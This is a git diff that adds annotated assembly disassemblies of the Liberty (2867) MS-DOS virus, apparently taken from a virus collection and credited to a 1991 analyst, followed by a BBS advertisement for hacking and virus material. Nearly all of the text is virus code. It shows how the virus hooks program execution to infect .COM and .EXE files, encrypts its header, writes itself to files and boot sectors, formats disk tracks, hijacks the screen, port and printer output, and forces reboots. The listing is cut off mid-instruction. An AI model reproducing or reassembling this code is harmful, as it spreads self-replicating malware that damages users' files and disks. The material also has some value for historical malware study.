884702 MOV [BX+02],AL +CS:0856 B80905 MOV AX,0509 ; +CS:0859 BBA607 MOV BX,07A6 ; +CS:085C B93128 MOV CX,2831 ; +CS:085F 9C PUSHF ; +CS:0860 2E CS: ; +CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28 +CS:0865 72A7 JB 080E +CS:0867 B80103 MOV AX,0301 ; +CS:086A BB420C MOV BX,0C42 ; +CS:086D B93F28 MOV CX,283F ; +CS:0870 9C PUSHF ; +CS:0871 2E CS: ; +CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector +CS:0876 7296 JB 080E +CS:0878 B80103 MOV AX,0301 ; +CS:087B BB3506 MOV BX,0635 ; +CS:087E B90100 MOV CX,0001 ; +CS:0881 9C PUSHF ; +CS:0882 2E CS: ; +CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0887 7285 JB 080E +CS:0889 B80803 MOV AX,0308 ; +CS:088C BB1001 MOV BX,0110 ; +CS:088F B93128 MOV CX,2831 ; +CS:0892 9C PUSHF ; +CS:0893 2E CS: ; +CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0898 E973FF JMP 080E +CS:089B 9C PUSHF +CS:089C 50 PUSH AX +CS:089D 1E PUSH DS +CS:089E 33C0 XOR AX,AX +CS:08A0 8ED8 MOV DS,AX +CS:08A2 833E860000 CMP WORD PTR [0086],+00 ; +CS:08A7 750F JNZ 08B8 ; Check if DOS is installed +CS:08A9 833E840000 CMP WORD PTR [0084],+00 ; +CS:08AE 7508 JNZ 08B8 +CS:08B0 1F POP DS +CS:08B1 58 POP AX +CS:08B2 9D POPF +CS:08B3 EA00000000 JMP 0000:0000 +CS:08B8 06 PUSH ES +CS:08B9 0E PUSH CS +CS:08BA 07 POP ES +CS:08BB E8C3F9 CALL 0281 ; Get vector 21h +CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h +CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h +CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag +CS:08C7 07 POP ES +CS:08C8 EBE6 JMP 08B0 +; +; Revectoring +; +CS:08CA A12000 MOV AX,[0020] +CS:08CD 2E CS: +CS:08CE A3B408 MOV [08B4],AX +CS:08D1 A12200 MOV AX,[0022] +CS:08D4 2E CS: +CS:08D5 A3B608 MOV [08B6],AX +CS:08D8 B89B08 MOV AX,089B +CS:08DB FA CLI +CS:08DC A32000 MOV [0020],AX +CS:08DF 8C0E2200 MOV [0022],CS +CS:08E3 C3 RET +CS:08E4 33C0 XOR AX,AX +CS:08E6 8ED8 MOV DS,AX +CS:08E8 FA CLI +CS:08E9 2E CS: +CS:08EA A1B408 MOV AX,[08B4] +CS:08ED A32000 MOV [0020],AX +CS:08F0 2E CS: +CS:08F1 A1B608 MOV AX,[08B6] +CS:08F4 
A32200 MOV [0022],AX +CS:08F7 C3 RET +CS:08F8 A17000 MOV AX,[0070] +CS:08FB 2E CS: +CS:08FC A3900A MOV [0A90],AX +CS:08FF A17200 MOV AX,[0072] +CS:0902 2E CS: +CS:0903 A3920A MOV [0A92],AX +CS:0906 B8580A MOV AX,0A58 +CS:0909 FA CLI +CS:090A A37000 MOV [0070],AX +CS:090D 8C0E7200 MOV [0072],CS +CS:0911 C3 RET +; +; The next routine displays 'M A G I C ! !' on the screen for a second +; +CS:0912 50 PUSH AX +CS:0913 53 PUSH BX +CS:0914 51 PUSH CX +CS:0915 52 PUSH DX +CS:0916 56 PUSH SI +CS:0917 57 PUSH DI +CS:0918 1E PUSH DS +CS:0919 06 PUSH ES +CS:091A 9C PUSHF +CS:091B BB00B8 MOV BX,B800 ; +CS:091E 8EDB MOV DS,BX ; +CS:0920 0E PUSH CS ; +CS:0921 07 POP ES ; +CS:0922 33F6 XOR SI,SI ; +CS:0924 BF6809 MOV DI,0968 ; +CS:0927 B9A000 MOV CX,00A0 ; +CS:092A F3 REPZ ; +CS:092B A4 MOVSB ; Save screen +CS:092C BB00B8 MOV BX,B800 ; +CS:092F 8EC3 MOV ES,BX ; +CS:0931 0E PUSH CS ; +CS:0932 1F POP DS ; +CS:0933 33FF XOR DI,DI ; +CS:0935 BB080A MOV BX,0A08 ; +CS:0938 B95000 MOV CX,0050 ; +CS:093B B6CE MOV DH,CE ; +CS:093D 8A17 MOV DL,[BX] ; +CS:093F 80EA03 SUB DL,03 ; +CS:0942 26 ES: ; +CS:0943 8915 MOV [DI],DX ; +CS:0945 47 INC DI ; +CS:0946 47 INC DI ; +CS:0947 43 INC BX ; +CS:0948 E2F3 LOOP 093D ; Put text on screen +CS:094A E2FE LOOP 094A ; Wait +CS:094C BB00B8 MOV BX,B800 ; +CS:094F 8EC3 MOV ES,BX ; +CS:0951 0E PUSH CS ; +CS:0952 1F POP DS ; +CS:0953 33FF XOR DI,DI ; +CS:0955 BE6809 MOV SI,0968 ; +CS:0958 B9A000 MOV CX,00A0 ; +CS:095B F3 REPZ ; +CS:095C A4 MOVSB ; Restore screen +CS:095D 9D POPF +CS:095E 07 POP ES +CS:095F 1F POP DS +CS:0960 5F POP DI +CS:0961 5E POP SI +CS:0962 5A POP DX +CS:0963 59 POP CX +CS:0964 5B POP BX +CS:0965 58 POP AX +CS:0966 C3 RET +; +; A temporary screen buffer +; +DS:0960 4D 41 47 49 43 4D 41 47 +DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:09B0 47 49 43 4D 41 
47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? 
+CS:0A87 7503 JNZ 0A8C +CS:0A89 E886FE CALL 0912 ; Mess up screen +CS:0A8C 1F POP DS +CS:0A8D 58 POP AX +CS:0A8E 9D POPF +CS:0A8F EA00000000 JMP 0000:0000 ; Continue +CS:0A9B B8FFFF MOV AX,FFFF +CS:0A9E 50 PUSH AX +CS:0A9F 33C0 XOR AX,AX +CS:0AA1 50 PUSH AX +CS:0AA2 CB RETF +CS:0AA3 2E CS: +CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150 +CS:0AAA 33C0 XOR AX,AX +CS:0AAC 8ED8 MOV DS,AX +CS:0AAE 2E CS: +CS:0AAF C606470B00 MOV BYTE PTR [0B47],00 +CS:0AB4 90 NOP +CS:0AB5 2E CS: +CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00 +CS:0ABB 90 NOP +CS:0ABC 2E CS: +CS:0ABD C606080C00 MOV BYTE PTR [0C08],00 +CS:0AC2 90 NOP +CS:0AC3 EBC7 JMP 0A8C +CS:0AC5 2E CS: +CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF +CS:0ACB 90 NOP +CS:0ACC 2E CS: +CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF +CS:0AD2 90 NOP +CS:0AD3 2E CS: +CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF +CS:0AD9 90 NOP +CS:0ADA 2E CS: +CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000 +CS:0AE1 2E CS: +CS:0AE2 FF06960A INC WORD PTR [0A96] +CS:0AE6 EBA4 JMP 0A8C +CS:0AE8 A14000 MOV AX,[0040] +CS:0AEB 2E CS: +CS:0AEC A3430B MOV [0B43],AX +CS:0AEF A14200 MOV AX,[0042] +CS:0AF2 2E CS: +CS:0AF3 A3450B MOV [0B45],AX +CS:0AF6 B8360B MOV AX,0B36 +CS:0AF9 FA CLI +CS:0AFA A34000 MOV [0040],AX +CS:0AFD 8C0E4200 MOV [0042],CS +CS:0B01 C3 RET +CS:0B02 FA CLI +CS:0B03 A15000 MOV AX,[0050] +CS:0B06 2E CS: +CS:0B07 A3910B MOV [0B91],AX +CS:0B0A A15200 MOV AX,[0052] +CS:0B0D 2E CS: +CS:0B0E A3930B MOV [0B93],AX +CS:0B11 B8840B MOV AX,0B84 +CS:0B14 A35000 MOV [0050],AX +CS:0B17 8C0E5200 MOV [0052],CS +CS:0B1B C3 RET +CS:0B1C FA CLI +CS:0B1D A15C00 MOV AX,[005C] +CS:0B20 2E CS: +CS:0B21 A3040C MOV [0C04],AX +CS:0B24 A15E00 MOV AX,[005E] +CS:0B27 2E CS: +CS:0B28 A3060C MOV [0C06],AX +CS:0B2B B8FC0B MOV AX,0BFC +CS:0B2E A35C00 MOV [005C],AX +CS:0B31 8C0E5E00 MOV [005E],CS +CS:0B35 C3 RET +; +; Now the gadgets' routines. When activated, only the word MAGIC!! will be +; sent to screen, port, and printer. 
+; +CS:0B36 9C PUSHF ; Screen +CS:0B37 80FC09 CMP AH,09 +CS:0B3A 740F JZ 0B4B +CS:0B3C 80FC0A CMP AH,0A +CS:0B3F 740A JZ 0B4B +CS:0B41 9D POPF +CS:0B42 EA00000000 JMP 0000:0000 +CS:0B4B 2E CS: +CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF +CS:0B51 74EE JZ 0B41 +CS:0B53 53 PUSH BX +CS:0B54 56 PUSH SI +CS:0B55 50 PUSH AX +CS:0B56 33DB XOR BX,BX +CS:0B58 2E CS: +CS:0B59 833E480B07 CMP WORD PTR [0B48],+07 +CS:0B5E 7507 JNZ 0B67 +CS:0B60 2E CS: +CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000 +CS:0B67 2E CS: +CS:0B68 8B1E480B MOV BX,[0B48] +CS:0B6C 2E CS: +CS:0B6D 8B3E480B MOV DI,[0B48] +CS:0B71 47 INC DI +CS:0B72 2E CS: +CS:0B73 893E480B MOV [0B48],DI +CS:0B77 BE3B0C MOV SI,0C3B +CS:0B7A 58 POP AX +CS:0B7B 2E CS: +CS:0B7C 8A00 MOV AL,[BX+SI] +CS:0B7E FEC0 INC AL +CS:0B80 5E POP SI +CS:0B81 5B POP BX +CS:0B82 EBBD JMP 0B41 +CS:0B84 9C PUSHF ; Port +CS:0B85 80FC01 CMP AH,01 +CS:0B88 740D JZ 0B97 +CS:0B8A 80FC02 CMP AH,02 +CS:0B8D 7436 JZ 0BC5 +CS:0B8F 9D POPF +CS:0B90 EA00000000 JMP 0000:0000 +CS:0B97 2E CS: +CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF +CS:0B9D 74F0 JZ 0B8F +CS:0B9F 53 PUSH BX +CS:0BA0 56 PUSH SI +CS:0BA1 33DB XOR BX,BX +CS:0BA3 2E CS: +CS:0BA4 8A1E960B MOV BL,[0B96] +CS:0BA8 BE3B0C MOV SI,0C3B +CS:0BAB 2E CS: +CS:0BAC 8A00 MOV AL,[BX+SI] +CS:0BAE 2E CS: +CS:0BAF FE06960B INC BYTE PTR [0B96] +CS:0BB3 2E CS: +CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BB9 7506 JNZ 0BC1 +CS:0BBB 2E CS: +CS:0BBC C606960B00 MOV BYTE PTR [0B96],00 +CS:0BC1 5E POP SI +CS:0BC2 5B POP BX +CS:0BC3 EBCA JMP 0B8F +CS:0BC5 2E CS: +CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF +CS:0BCB 74C2 JZ 0B8F +CS:0BCD 2E CS: +CS:0BCE FF1E910B CALL FAR [0B91] +CS:0BD2 80FC00 CMP AH,00 +CS:0BD5 7F24 JG 0BFB +CS:0BD7 53 PUSH BX +CS:0BD8 56 PUSH SI +CS:0BD9 33DB XOR BX,BX +CS:0BDB 2E CS: +CS:0BDC 8A1E960B MOV BL,[0B96] +CS:0BE0 BE3B0C MOV SI,0C3B +CS:0BE3 2E CS: +CS:0BE4 8A00 MOV AL,[BX+SI] +CS:0BE6 2E CS: +CS:0BE7 FE06960B INC BYTE PTR [0B96] +CS:0BEB 2E CS: +CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07 
+CS:0BF1 7506 JNZ 0BF9 +CS:0BF3 2E CS: +CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00 +CS:0BF9 5E POP SI +CS:0BFA 5B POP BX +CS:0BFB CF IRET +CS:0BFC 9C PUSHF ; Printer +CS:0BFD 80FC00 CMP AH,00 +CS:0C00 7407 JZ 0C09 +CS:0C02 9D POPF +CS:0C03 EA00000000 JMP 0000:0000 +CS:0C09 2E CS: +CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF +CS:0C0F 74F1 JZ 0C02 +CS:0C11 53 PUSH BX +CS:0C12 56 PUSH SI +CS:0C13 33DB XOR BX,BX +CS:0C15 2E CS: +CS:0C16 8A1E3A0C MOV BL,[0C3A] +CS:0C1A BE3B0C MOV SI,0C3B +CS:0C1D 2E CS: +CS:0C1E 8A00 MOV AL,[BX+SI] +CS:0C20 FEC0 INC AL +CS:0C22 2E CS: +CS:0C23 FE063A0C INC BYTE PTR [0C3A] +CS:0C27 2E CS: +CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07 +CS:0C2D 7507 JNZ 0C36 +CS:0C2F 2E CS: +CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00 +CS:0C35 90 NOP +CS:0C36 5E POP SI +CS:0C37 5B POP BX +CS:0C38 EBC8 JMP 0C02 +; +; The encrypted text 'MAGIC!!' +; +DS:0C3A 4C 40 46 48 42 20 20 +; +; Important note: +; When there is no longer space on the disk to infect a file, the Liberty +; virus will infect the bootsector. This is done in the 'OHIO' way. +; +; +; +; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort. +; This document may be freely shared. If you have any comments or some +; nice little viruses for analysis, feel free to drop me a note. +; +; Remco van Helvoort +; Bredastraat 3 +; 5224 VD 's-Hertogenbosch +; Holland +; + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.liberty2.lst b/MSDOS/Virus.MSDOS.Unknown.liberty2.lst new file mode 100644 index 00000000..ad39d293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.liberty2.lst 
@@ -0,0 +1,1194 @@ +CS:0110 EB79 JMP 018B +CS:0112 90 NOP +; +; The program's original infomation is stored between these sections +; +CS:018B 2E CS: +CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:0191 7403 JZ 0196 +CS:0193 1F POP DS +CS:0194 59 POP CX +CS:0195 5B POP BX +CS:0196 50 PUSH AX +CS:0197 53 PUSH BX +CS:0198 51 PUSH CX +CS:0199 52 PUSH DX +CS:019A 1E PUSH DS +CS:019B 06 PUSH ES +CS:019C 1E PUSH DS +CS:019D 0E PUSH CS +CS:019E 1F POP DS +CS:019F E8CD00 CALL 026F ; Installation check +CS:01A2 3DFFFF CMP AX,FFFF +CS:01A5 741A JZ 01C1 +CS:01A7 E8D700 CALL 0281 ; Get vector 21h +CS:01AA 07 POP ES +CS:01AB 06 PUSH ES +CS:01AC 8CC0 MOV AX,ES +CS:01AE 48 DEC AX +CS:01AF 8ED8 MOV DS,AX +CS:01B1 E8DC00 CALL 0290 ; Adjust MCB +CS:01B4 8EC0 MOV ES,AX +CS:01B6 0E PUSH CS +CS:01B7 1F POP DS +CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory +CS:01BB E8F400 CALL 02B2 ; Set vector 21h +CS:01BE E80101 CALL 02C2 ; Set installation flag +CS:01C1 2E CS: +CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? 
+CS:01C7 7417 JZ 01E0 +CS:01C9 07 POP ES +CS:01CA 0E PUSH CS +CS:01CB 1F POP DS +CS:01CC E80901 CALL 02D8 ; Decrypt header +CS:01CF E81901 CALL 02EB ; Restore header +CS:01D2 07 POP ES +CS:01D3 1F POP DS +CS:01D4 5A POP DX +CS:01D5 59 POP CX +CS:01D6 5B POP BX +CS:01D7 58 POP AX +CS:01D8 1E PUSH DS +CS:01D9 BF0001 MOV DI,0100 +CS:01DC 57 PUSH DI +CS:01DD 33FF XOR DI,DI +CS:01DF CB RETF ; Start file +CS:01E0 FA CLI +CS:01E1 5E POP SI +CS:01E2 07 POP ES +CS:01E3 1F POP DS +CS:01E4 5A POP DX +CS:01E5 59 POP CX +CS:01E6 5B POP BX +CS:01E7 58 POP AX +CS:01E8 2E CS: +CS:01E9 8B3E2C06 MOV DI,[062C] +CS:01ED 03FE ADD DI,SI +CS:01EF 8ED7 MOV SS,DI +CS:01F1 2E CS: +CS:01F2 8B3E2E06 MOV DI,[062E] +CS:01F6 8BE7 MOV SP,DI ; Restore stack +CS:01F8 2E CS: +CS:01F9 8B3E2806 MOV DI,[0628] +CS:01FD 03FE ADD DI,SI +CS:01FF 57 PUSH DI +CS:0200 2E CS: +CS:0201 FF362A06 PUSH [062A] +CS:0205 33F6 XOR SI,SI +CS:0207 EBD4 JMP 01DD ; Start file +; +; The encrypted Liberty header for .COM files +; +DS:0200 1D 69 D9 00 01 01 +DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02 +DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92 +DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81 +DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A +DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6 +DS:0260 46 E5 20 02 +; +; Various subroutines used by the virus +; +CS:026F 2E CS: +CS:0270 8A1E6A02 MOV BL,[026A] +CS:0274 32FF XOR BH,BH +CS:0276 33C0 XOR AX,AX +CS:0278 8ED8 MOV DS,AX +CS:027A D1E3 SHL BX,1 +CS:027C D1E3 SHL BX,1 +CS:027E 8B07 MOV AX,[BX] +CS:0280 C3 RET +CS:0281 A18400 MOV AX,[0084] +CS:0284 2E CS: +CS:0285 A38C03 MOV [038C],AX +CS:0288 A18600 MOV AX,[0086] +CS:028B 2E CS: +CS:028C A38E03 MOV [038E],AX +CS:028F C3 RET +CS:0290 BB4221 MOV BX,2142 +CS:0293 B104 MOV CL,04 +CS:0295 D3EB SHR BX,CL +CS:0297 291E0300 SUB [0003],BX +CS:029B A10300 MOV AX,[0003] +CS:029E 03060100 ADD AX,[0001] +CS:02A2 A31200 MOV [0012],AX +CS:02A5 40 INC AX +CS:02A6 C3 RET +CS:02A7 BF1001 MOV 
DI,0110 +CS:02AA 8BF7 MOV SI,DI +CS:02AC B99A05 MOV CX,059A +CS:02AF F3 REPZ +CS:02B0 A5 MOVSW +CS:02B1 C3 RET +CS:02B2 33C0 XOR AX,AX +CS:02B4 8ED8 MOV DS,AX +CS:02B6 FA CLI +CS:02B7 B86C03 MOV AX,036C +CS:02BA A38400 MOV [0084],AX +CS:02BD 8C068600 MOV [0086],ES +CS:02C1 C3 RET +CS:02C2 FA CLI +CS:02C3 B8FFFF MOV AX,FFFF +CS:02C6 2E CS: +CS:02C7 8A1E6A02 MOV BL,[026A] +CS:02CB 32FF XOR BH,BH +CS:02CD D1E3 SHL BX,1 +CS:02CF D1E3 SHL BX,1 +CS:02D1 8907 MOV [BX],AX +CS:02D3 40 INC AX +CS:02D4 894702 MOV [BX+02],AX +CS:02D7 C3 RET +CS:02D8 B93C00 MOV CX,003C +CS:02DB BE1301 MOV SI,0113 +CS:02DE 2E CS: +CS:02DF 8B14 MOV DX,[SI] +CS:02E1 D3CA ROR DX,CL +CS:02E3 2E CS: +CS:02E4 8914 MOV [SI],DX +CS:02E6 46 INC SI +CS:02E7 46 INC SI +CS:02E8 E2F4 LOOP 02DE +CS:02EA C3 RET +CS:02EB BF0001 MOV DI,0100 +CS:02EE BE1301 MOV SI,0113 +CS:02F1 B93C00 MOV CX,003C +CS:02F4 F3 REPZ +CS:02F5 A5 MOVSW +CS:02F6 C3 RET +; +; I am not sure what the next routine is supposed to be doing. +; +CS:02F7 9C PUSHF +CS:02F8 2E CS: +CS:02F9 803E100301 CMP BYTE PTR [0310],01 +CS:02FE 740A JZ 030A +CS:0300 80FC03 CMP AH,03 +CS:0303 7505 JNZ 030A +CS:0305 80FA80 CMP DL,80 +CS:0308 7207 JB 0311 +CS:030A 9D POPF +CS:030B EA00000000 JMP 0000:0000 +CS:0311 06 PUSH ES +CS:0312 0E PUSH CS +CS:0313 07 POP ES +CS:0314 B80902 MOV AX,0209 +CS:0317 BB420C MOV BX,0C42 +CS:031A B90100 MOV CX,0001 +CS:031D 9C PUSHF +CS:031E 2E CS: +CS:031F FF1E0C03 CALL FAR [030C] +CS:0323 72E5 JB 030A +CS:0325 B80905 MOV AX,0509 +CS:0328 BB4803 MOV BX,0348 +CS:032B B93100 MOV CX,0031 +CS:032E 9C PUSHF +CS:032F 2E CS: +CS:0330 FF1E0C03 CALL FAR [030C] +CS:0334 72D4 JB 030A +CS:0336 B80903 MOV AX,0309 +CS:0339 BB420C MOV BX,0C42 +CS:033C B93100 MOV CX,0031 +CS:033F 9C PUSHF +CS:0340 2E CS: +CS:0341 FF1E0C03 CALL FAR [030C] +CS:0345 07 POP ES +CS:0346 9D POPF +CS:0347 CF IRET +; +; Another format table used by the virus +; +DS:0340 00 00 31 02 00 00 32 02 +DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02 +DS:0360 00 00 37 02 
00 00 38 02-00 00 39 02 +; +; The virus infects files by monitoring function 4Bh of vector 21h +; +CS:036C 9C PUSHF +CS:036D 3D004B CMP AX,4B00 ; Execute function ? +CS:0370 741E JZ 0390 +CS:0372 EB16 JMP 038A +CS:0374 90 NOP +CS:0375 E8B901 CALL 0531 ; Close file +CS:0378 E89A00 CALL 0415 ; Restore vectors +CS:037B C6060C04FF MOV BYTE PTR [040C],FF +CS:0380 90 NOP +CS:0381 9D POPF +CS:0382 07 POP ES +CS:0383 1F POP DS +CS:0384 5F POP DI +CS:0385 5E POP SI +CS:0386 5A POP DX +CS:0387 59 POP CX +CS:0388 5B POP BX +CS:0389 58 POP AX +CS:038A 9D POPF +CS:038B EA77142C02 JMP 022C:1477 ; Continue +CS:0390 50 PUSH AX +CS:0391 53 PUSH BX +CS:0392 51 PUSH CX +CS:0393 52 PUSH DX +CS:0394 56 PUSH SI +CS:0395 57 PUSH DI +CS:0396 1E PUSH DS +CS:0397 06 PUSH ES +CS:0398 9C PUSHF +CS:0399 E8A600 CALL 0442 ; Set error vectors +CS:039C E8E100 CALL 0480 ; Open file +CS:039F 72D4 JB 0375 +CS:03A1 0E PUSH CS +CS:03A2 1F POP DS +CS:03A3 0E PUSH CS +CS:03A4 07 POP ES +CS:03A5 A30A04 MOV [040A],AX +CS:03A8 93 XCHG BX,AX +CS:03A9 C6060C0401 MOV BYTE PTR [040C],01 +CS:03AE 90 NOP +CS:03AF E8D800 CALL 048A ; Read file header +CS:03B2 72C1 JB 0375 +CS:03B4 BB1301 MOV BX,0113 +CS:03B7 2E CS: +CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ? 
+CS:03BC 7505 JNZ 03C3 +CS:03BE E8C001 CALL 0581 ; Adapt header +CS:03C1 EBB2 JMP 0375 +CS:03C3 2E CS: +CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch +CS:03C9 E8CD00 CALL 0499 ; Check infection +CS:03CC 74A7 JZ 0375 +CS:03CE E8DD00 CALL 04AE ; Encrypt header +CS:03D1 E8EB00 CALL 04BF ; Move to EOF +CS:03D4 729F JB 0375 +CS:03D6 83FA00 CMP DX,+00 ; +CS:03D9 759A JNZ 0375 ; +CS:03DB 3D0005 CMP AX,0500 ; +CS:03DE 7295 JB 0375 ; +CS:03E0 3DFFEF CMP AX,EFFF ; +CS:03E3 7390 JNB 0375 ; Check file size +CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph +CS:03E8 728B JB 0375 +CS:03EA E80701 CALL 04F4 ; Write virus +CS:03ED 7286 JB 0375 +CS:03EF 3BC1 CMP AX,CX +CS:03F1 7C11 JL 0404 +CS:03F3 E81301 CALL 0509 ; Move to BOF +CS:03F6 7209 JB 0401 +CS:03F8 E86201 CALL 055D ; Decrypt Libery header +CS:03FB E81E01 CALL 051C ; Write Liberty header +CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header +CS:0401 E971FF JMP 0375 +CS:0404 E83801 CALL 053F ; Set & get vector 13h +CS:0407 E96BFF JMP 0375 +; +; Revectoring of error vectors. 
+; +CS:0415 1E PUSH DS +CS:0416 33DB XOR BX,BX +CS:0418 8EDB MOV DS,BX +CS:041A FA CLI +CS:041B 2E CS: +CS:041C 8B1E0D04 MOV BX,[040D] +CS:0420 891E8C00 MOV [008C],BX +CS:0424 2E CS: +CS:0425 8B1E0F04 MOV BX,[040F] +CS:0429 891E8E00 MOV [008E],BX +CS:042D FA CLI +CS:042E 2E CS: +CS:042F 8B1E1104 MOV BX,[0411] +CS:0433 891E9000 MOV [0090],BX +CS:0437 2E CS: +CS:0438 8B1E1304 MOV BX,[0413] +CS:043C 891E8E00 MOV [008E],BX +CS:0440 1F POP DS +CS:0441 C3 RET +CS:0442 1E PUSH DS +CS:0443 33DB XOR BX,BX +CS:0445 8EDB MOV DS,BX +CS:0447 8B1E8C00 MOV BX,[008C] +CS:044B 2E CS: +CS:044C 891E0D04 MOV [040D],BX +CS:0450 8B1E8E00 MOV BX,[008E] +CS:0454 2E CS: +CS:0455 891E0F04 MOV [040F],BX +CS:0459 FA CLI +CS:045A BB3106 MOV BX,0631 +CS:045D 891E8C00 MOV [008C],BX +CS:0461 8C0E8E00 MOV [008E],CS +CS:0465 8B1E9000 MOV BX,[0090] +CS:0469 2E CS: +CS:046A 891E1104 MOV [0411],BX +CS:046E 8B1E9200 MOV BX,[0092] +CS:0472 FA CLI +CS:0473 BB3206 MOV BX,0632 +CS:0476 891E9000 MOV [0090],BX +CS:047A 8C0E9200 MOV [0092],CS +CS:047E 1F POP DS +CS:047F C3 RET +; +; Various subroutines used by the virus +; +CS:0480 B8023D MOV AX,3D02 +CS:0483 9C PUSHF +CS:0484 2E CS: +CS:0485 FF1E8C03 CALL FAR [038C] +CS:0489 C3 RET +CS:048A B43F MOV AH,3F +CS:048C B97800 MOV CX,0078 +CS:048F BA1301 MOV DX,0113 +CS:0492 9C PUSHF +CS:0493 2E CS: +CS:0494 FF1E8C03 CALL FAR [038C] +CS:0498 C3 RET +CS:0499 BF1301 MOV DI,0113 +CS:049C 81C76802 ADD DI,0268 +CS:04A0 81EF0A02 SUB DI,020A +CS:04A4 BE6802 MOV SI,0268 +CS:04A7 FC CLD +CS:04A8 B90700 MOV CX,0007 +CS:04AB F3 REPZ +CS:04AC A6 CMPSB +CS:04AD C3 RET +CS:04AE B93C00 MOV CX,003C +CS:04B1 BE1301 MOV SI,0113 +CS:04B4 8B14 MOV DX,[SI] +CS:04B6 D3C2 ROL DX,CL +CS:04B8 8914 MOV [SI],DX +CS:04BA 46 INC SI +CS:04BB 46 INC SI +CS:04BC E2F6 LOOP 04B4 +CS:04BE C3 RET +CS:04BF B80242 MOV AX,4202 +CS:04C2 2E CS: +CS:04C3 8B1E0A04 MOV BX,[040A] +CS:04C7 33C9 XOR CX,CX +CS:04C9 